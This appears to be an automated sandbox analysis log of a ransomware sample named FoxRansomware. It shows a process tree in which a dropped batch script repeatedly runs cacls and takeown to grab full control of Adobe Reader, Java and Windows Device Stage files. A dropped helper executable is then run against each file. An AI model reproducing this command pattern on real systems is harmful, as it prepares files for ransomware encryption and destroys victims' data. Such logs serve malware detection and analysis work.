C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:3688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:2248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can.hyp" -nobanner3⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "can.hyp" -nobanner4⤵
- Executes dropped EXE
PID:3368
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵
- Loads dropped DLL
PID:2692 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵
- Modifies file permissions
PID:4056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa37.hyp" -nobanner3⤵
- Loads dropped DLL
PID:3992 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "usa37.hyp" -nobanner4⤵
- Executes dropped EXE
PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵
- Loads dropped DLL
PID:1960 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:2784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵
- Modifies file permissions
PID:776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ICELAND.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ICELAND.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵
- Loads dropped DLL
PID:3852 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:3732
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵
- Modifies file permissions
PID:2624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1254.TXT" -nobanner3⤵
- Loads dropped DLL
PID:3816 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1254.TXT" -nobanner4⤵
- Executes dropped EXE
PID:3836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵
- Loads dropped DLL
PID:2620 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:3496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "overlay.png" -nobanner3⤵
- Loads dropped DLL
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "overlay.png" -nobanner4⤵
- Executes dropped EXE
PID:712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵
- Loads dropped DLL
PID:1708 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:1716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:3920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵
- Loads dropped DLL
PID:3544 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:3588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner3⤵
- Loads dropped DLL
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "background.png" -nobanner4⤵
- Executes dropped EXE
PID:2672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵
- Loads dropped DLL
PID:3948 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:2272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵
- Loads dropped DLL
PID:2256 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:1768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵
- Loads dropped DLL
PID:2060 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:3328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AUMProduct.cer" -nobanner3⤵
- Loads dropped DLL
PID:3268 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AUMProduct.cer" -nobanner4⤵
- Executes dropped EXE
PID:440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:312 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵
- Loads dropped DLL
PID:3140 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:3088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "email_all.gif" -nobanner3⤵
- Loads dropped DLL
PID:1156 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "email_all.gif" -nobanner4⤵
- Executes dropped EXE
PID:2304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵
- Loads dropped DLL
PID:1688 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:4112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "open_original_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:3524 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "open_original_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:3316
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵
- Loads dropped DLL
PID:3768 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:2872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "rss.gif" -nobanner3⤵
- Loads dropped DLL
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "rss.gif" -nobanner4⤵
- Executes dropped EXE
PID:3924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:3540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:3804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:3380
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵
- Executes dropped EXE
PID:3880
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:3076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:3252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:3236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:2036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:2096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵
- Modifies file permissions
PID:3632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SY______.PFM" -nobanner3⤵PID:3148
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SY______.PFM" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:3136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:2308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵
- Modifies file permissions
PID:3288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:1468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:3392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵
- Modifies file permissions
PID:2104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can129.hsp" -nobanner3⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "can129.hsp" -nobanner4⤵PID:3320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:1104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:4204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:4212
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:3772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:4280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:4300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:4292
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:4284
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:4252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:4364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:4256
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:4480
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:4372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner3⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "background.png" -nobanner4⤵PID:4500
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:4556
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:4568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵
    (PID 4504; Suspicious use of AdjustPrivilegeToken)
    C:\Windows\SysWOW64\cmd.exe (PID 4596): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4580): sOCkujKF.exe -accepteula "tasks.xml" -nobanner
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4612): sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
  C:\Windows\SysWOW64\cmd.exe (PID 4644): cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
    C:\Windows\SysWOW64\cacls.exe (PID 4680): cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    C:\Windows\SysWOW64\takeown.exe (PID 4648): takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
    C:\Windows\SysWOW64\cmd.exe (PID 4672): C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner
      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 4688): sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner
